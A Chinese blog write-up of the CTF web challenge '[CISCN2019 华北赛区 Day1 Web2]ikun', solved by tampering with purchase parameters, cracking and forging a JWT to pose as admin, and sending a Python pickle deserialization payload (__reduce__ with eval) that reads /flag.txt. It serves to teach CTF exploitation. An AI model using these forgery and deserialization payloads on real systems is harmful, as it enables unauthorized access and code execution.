BUUCTF-[CISCN2019 华北赛区 Day1 Web2]ikun

最新推荐文章于 2024-05-03 21:57:54 发布
最新推荐文章于 2024-05-03 21:57:54 发布
阅读量576 收藏
点赞数
分类专栏: CTF WP 文章标签: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52517939/article/details/116780882
版权
CTF 同时被 2 个专栏收录
8 篇文章 0 订阅
订阅专栏
WP
7 篇文章 0 订阅
订阅专栏

BUUCTF-[CISCN2019 华北赛区 Day1 Web2]ikun

鸡你太美

看一下网页
在这里插入图片描述
这段视频真不错!!!好了,看题

开始

让我们先注册一个账号,登陆后竟然有¥1000

ikun们冲鸭,一定要买到Lv6

让我们买到Lv6,上脚本找一下


import requests
from time import *
url="http://6777eeab-1fd2-4a3c-b124-d2ac0b67fd9b.node3.buuoj.cn/shop?page={}"
for i in range(1000):
    r=requests.get(url=url.format(i))
    if "/lv/lv6" in r.text:
        print(i)
    sleep(0.1)

当?page=181时出现了Lv6(我第一遍做的时候在180页…)
在这里插入图片描述
这价格有点高…话说有这些钱为什么要买这个东西
在这里插入图片描述
有一张8折优惠券,但钱还是不够,所以BurpSuite抓包改。

在这里插入图片描述

repeater一下
在这里插入图片描述
出现b1g_m4mber,访问一下
在这里插入图片描述

只允许admin访问,打开cookie有JWT,JWT在线解码
将payload的username内容替换为admin,加密生成JWT需要密钥。
有大佬已经写出破解工具了
https://github.com/brendan-rius/c-jwt-cracker
下载完后,在该目录文件夹下,终端输入make
在这里插入图片描述
解出来密钥为1Kun,伪造JWT
在这里插入图片描述

BurpSuite抓包,改JWT,放包
在这里插入图片描述
看到源码泄露,www.zip打上下载。

import tornado.web
from sshop.base import BaseHandler
import pickle
import urllib


class AdminHandler(BaseHandler):
    @tornado.web.authenticated
    def get(self, *args, **kwargs):
        if self.current_user == "admin":
            return self.render('form.html', res='This is Black Technology!', member=0)
        else:
            return self.render('no_ass.html')

    @tornado.web.authenticated
    def post(self, *args, **kwargs):
        try:
            become = self.get_argument('become')
            p = pickle.loads(urllib.unquote(become))
            return self.render('form.html', res=p, member=1)
        except:
            return self.render('form.html', res='This is Black Technology!', member=0)

有后门,是python反序列化。

 @tornado.web.authenticated
    def post(self, *args, **kwargs):
        try:
            become = self.get_argument('become')
            p = pickle.loads(urllib.unquote(become))
            return self.render('form.html', res=p, member=1)
        except:
            return self.render('form.html', res='This is Black Technology!', member=0)

但没学过python反序列化(=_=),上大佬脚本。python2去跑。

import os
import pickle
import urllib

class exp(object):
    def __reduce__(self):
        return (eval,("open('/flag.txt').read()",))

a=exp()
s=pickle.dumps(a)
print urllib.quote(s)

在这里插入图片描述
生成的payload,成为Lv6时BurpSuite抓包,改become,然后放行,得到flag
在这里插入图片描述

Andy Noel
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
buuctf-[CISCN2019 华北赛区 Day1 Web2]ikun
qaq517384的博客
10-06 554
[CISCN2019 华北赛区 Day1 Web2]ikun 打开题目是一个kunkun和一句买到lv6的话 先注册一个登录栞栞,没有东西,应该就是要买lv6了 点击下一页url加上了?page=2 一开始循环里是url=url+str(i)然后就一直报500code,给自己一拳 lv6每页都有所以要加.png 结果是page=181 import requests url="http://93b9fe83-ed26-4bbe-b6af-b0fd164e9ab5.node4.buuoj.cn:81/sh
[BUUCTF][CISCN2019 华北赛区 Day1 Web2]ikun
Y4tacker的博客
09-01 7309
文章目录知识点JWTPICKLEWP部分第一步找到lv6第二步BURP抓包修改pickel参考文章 知识点 JWT JWT相关 JWT解密网站 JWT破解利用工具 PICKLE Pickle模块中最常用的函数为: (1)pickle.dump(obj, file, [,protocol]) 函数的功能:将obj对象序列化存入已经打开的file中。 参数讲解: obj:想要序列化的obj对象。 file:文件名称。 protocol:序
攻防世界——WEB题目Ikun_BILIBILI
Y_KolaFish_Y的博客
07-27 1658
ikun_bilibili_wp 一、获取lv6账号位置 import requests target = "http://111.200.241.244:61777/shop?page=%d" for i in range(500): print(i) res = requests.get(target%(i)).text if "lv6.png" in res: print(target%(i)) break http://111.200.241
2024年网络安全最新Web安全-CTF中的常见命令总结_webctf 修改css
最新发布
2401_84281588的博客
05-03 807
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
[CISCN2019 华北赛区 Day1 Web2]ikun 1
weixin_43940853的博客
03-16 562
写一个python脚本 import requests url = 'http://c8f78f51-2593-4b2a-8e72-f39543bc99dd.node3.buuoj.cn/shop?page={}' for i in range(1000): r = requests.get(url.format(str(i))) if 'lv6.png' in r.text: ...
网安学习-CTF夺旗
weixin_44770698的博客
08-26 2184
网安学习-CTF(Python反序列化+JWT)
ikun-kunkun-吃掉坤坤爱坤-html-源码.rar
03-30
是爱坤你就来
GT2大师探索版C02ROOT工具箱-1.exe
11-24
GT2大师探索版C02ROOT工具箱-1.exe
竞赛资料源码-光电比赛-IKUN队方案.zip
01-24
教育部认可的大学生竞赛备赛资料代码,源码,竞赛总结,所有源码均经过严格测试,可以直接运行,可以放心下载使用。有任何使用问题欢迎随时与博主沟通 全国电子设计大赛、全国大学生智能汽车竞赛、蓝桥杯、集成电路...
SSM-IKUN-图书管理系统
04-15
项目工具:IntelliJ IDEA 2021.2.2 图书后台管理系统,采用SpringBoot+Mybatius+Thymeleaf,页面使用Element框架,使用RESTful API风格编写接口。 数据库使用mysql 已实现功能 基本增删改查,联表查询 拦截器登录...
Linux系统设计-iKun专属的Linux操作系统
01-10
它继承了Unix以网络为核心的设计思想,是一个性能稳定的多用户网络操作系统,Linux是许多企业和服务提供商的首选操作系统,用于部署Web服务器、数据库服务器、邮件服务器等。Linux系统具有高效的网络功能和稳定的...
[CISCN2019 华北赛区 Day1 Web2]ikun
qq_62046696的博客
10-15 637
这里的.content就是读取源文件字节流,随后将该字节流编码为Unicode编码,方便再进行更加精确的解码。看见了jwt,通过上面链接了解jwt由三个部分组成,前两个部分分别是base64编码,解码可以获得。明显不够我们就1000也没有充值界面,所以最有可能的就是这个优惠看是否可以修改。以为要成功可是,限制admin,所以我们就要看一下是通过什么判断我的用户名的。下载到本地后需要使用,make命令,就会生成jwtcrack。找到了密码,然后就可以更改为admin。然后是181页,可是。
Web安全-CTF中的常见命令总结
m0_74220316的博客
01-21 1336
cat命令用于查看文件内容,并且将文件内容打印到标准输出流,并且在不跟上文件或跟上如上所示,输入123test,回车后将打印此内容,并且换行继续等待输入-n。
BUUCTF-WEB-[CISCN2019 华北赛区 Day1 Web2]ikun
weixin_43345082的博客
07-30 8481
当时没做出来,大佬复现了环境就做一波 题目 第一步提示我们要找到lv6 写个脚本找一下 import requests url="http://web44.buuoj.cn/shop?page=" for i in range(0,2000): r=requests.get(url+str(i)) if 'lv6.png' in r.text: print (i) break ...
[CISCN2019 华北赛区 Day1 Web2]ikun以一道例题从JWT安全到Pickle反序列化
sGanYu
05-22 1235
这道题前面几关还是挺简单的,主要重点是JWT安全和Pickle反序列化的问题,所以前面的关卡就简单描述一下步骤 先去注册一个账户 注册完账户后,我们就来到了第一关,刚开始本来想注册一个admin用户的,没想到已经被注册了,那么我猜接下来的内容会和admin有关了 这里有一个提示,开局给了我们1000块,让我们去购买lv6,当前链接是http://29e104e9-b299-4014-b700-cc0b3892187b.node4.buuoj.cn:81/shop?page=2,每点击一次下一页,p
BUUCTF刷题记录(2)
bmth666的博客
05-07 1832
文章目录web[De1CTF 2019]SSRF Me[极客大挑战 2019]PHP web [De1CTF 2019]SSRF Me [极客大挑战 2019]PHP 由于有备份文件,尝试www.zip发现可以下载!!! 得到flag.php文件,但发现Syc{dog_dog_dog_dog}并不是。。。。然后查看class.php得到 <?php include 'flag.php';...
攻防世界——web题目bilibili
baidu_36110484的博客
06-05 1753
0x00前言 照着大佬的wp复现了一下(捂脸),还是遇到蛮多问题的,于是记录一下。 0x01 进到主页面,发现一个注册按钮,还有一个提示:ikun们冲鸭,一定要买到lv6!!!。先注册个账号再说叭。 接下来就是要找到lv6的小电视进行购买。而一共page有500页,写脚本来找比较方便。按F12看到每个等级的图片的命名规则大概就是lvx.png。于是就写了下面的代码 from urllib import request url = "http://220.249.52.133:56346/shop?page
swin-transformer v2
10-24
Swin Transformer V2是一种基于Swin Transformer的模型,它通过增加模型的容量和分辨率来提高性能。作者保持了原始Swin Transformer的阶段、块和通道设置,并增加了更多的特征金字塔网络和更高的分辨率输入。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值